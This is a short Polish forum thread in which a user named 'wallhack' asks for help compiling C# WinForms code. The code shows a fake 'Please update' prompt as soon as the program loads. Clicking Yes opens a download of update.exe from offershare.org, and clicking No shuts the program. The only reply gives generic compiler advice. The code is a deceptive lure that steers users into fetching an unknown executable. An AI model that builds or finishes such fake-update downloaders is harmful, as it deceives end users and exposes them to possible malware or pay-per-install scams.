![]() |
|
Pomoc w Visual Studio - Wersja do druku +- Praca w domu - Dodatkowa Praca - Zarabianie przez Internet (https://zarabiam.com) +-- Dział: Off-Topic (https://zarabiam.com/Forum-Off-Topic-9) +--- Dział: Kosz/Spam/Archiwum (https://zarabiam.com/Forum-Kosz-Spam-Archiwum-11) +--- Wątek: Pomoc w Visual Studio (/Temat-Pomoc-w-Visual-Studio-73081) |
Pomoc w Visual Studio - wallhack - 20-07-2013 Witam , nie mogę skompilować tego kodu jako program .exe . Czy znalazłaby się dobra dusza , która pomogłaby mi ? Kod: using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Hack
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void Form1_Load(object sender, EventArgs e)
{
Form1_FormClosing();
}
private void Form1_FormClosing()
{
const string message =
"There's an updated version of this program available. Would you like to download now?";
const string caption = "Please update";
var result = MessageBox.Show(message, caption,
MessageBoxButtons.YesNo,
MessageBoxIcon.Question);
// If the no button was pressed ...
if (result == DialogResult.No)
{
MessageBox.Show("Program will close now. If you want to use this program please update to the newest version.", "Please update");
this.Close();
}
else if (result == DialogResult.Yes)
{
System.Diagnostics.Process.Start("http://offershare.org/8480,update.exe");
this.Close();
}
}
}
}RE: Pomoc w Visual Studio - wallhack - 20-07-2013 Nikt nie pomoże ?
RE: Pomoc w Visual Studio - warzyw12 - 20-07-2013 Na dole pojawiają ci się informacje gdzie i jaki wystąpił błąd. |